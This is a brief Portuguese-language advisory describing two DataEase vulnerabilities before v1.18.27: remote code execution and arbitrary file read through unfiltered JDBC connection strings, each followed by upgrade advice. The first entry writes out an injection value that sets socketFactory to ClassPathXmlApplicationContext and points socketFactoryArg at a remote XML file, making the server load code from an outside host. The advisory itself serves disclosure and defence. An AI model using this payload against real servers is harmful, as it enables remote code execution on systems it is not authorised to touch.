H4Cking2Thegate

**Nome do software vulnerável e versões afetadas** Versões do DataEase anteriores à v1.18.27 **Descrição** O DataEase é uma ferramenta de análise de negócios de código aberto. Usuários autenticados podem executar código remotamente por meio da conexão JDBC do backend. Ao construir a string de conexão JDBC, os parâmetros não são filtrados. Construir o host como ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= pode acionar o método de construção `ClassPathXmlApplicationContext`. **Recomendações** Para versões anteriores à v1.18.27, atualize para a versão v1.18.27 ou posterior para resolver o problema. Como solução alternativa temporária, considere restringir o acesso à conexão JDBC para minimizar o risco de exploração. Evite usar os parâmetros `socketFactory` e `socketFactoryArg` na string de conexão JDBC até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do DataEase anteriores à 1.18.27 **Descrição** A vulnerabilidade permite que usuários autenticados leiam e deserializem arquivos arbitrários por meio da conexão JDBC em segundo plano. Isso se deve à falta de filtragem na construção da string de conexão JDBC. Não há soluções alternativas conhecidas para este problema. **Recomendações** Para versões anteriores à 1.18.27, atualize para a versão 1.18.27 ou posterior para resolver o problema. Como solução alternativa temporária, considere restringir o acesso à conexão JDBC para minimizar o risco de exploração.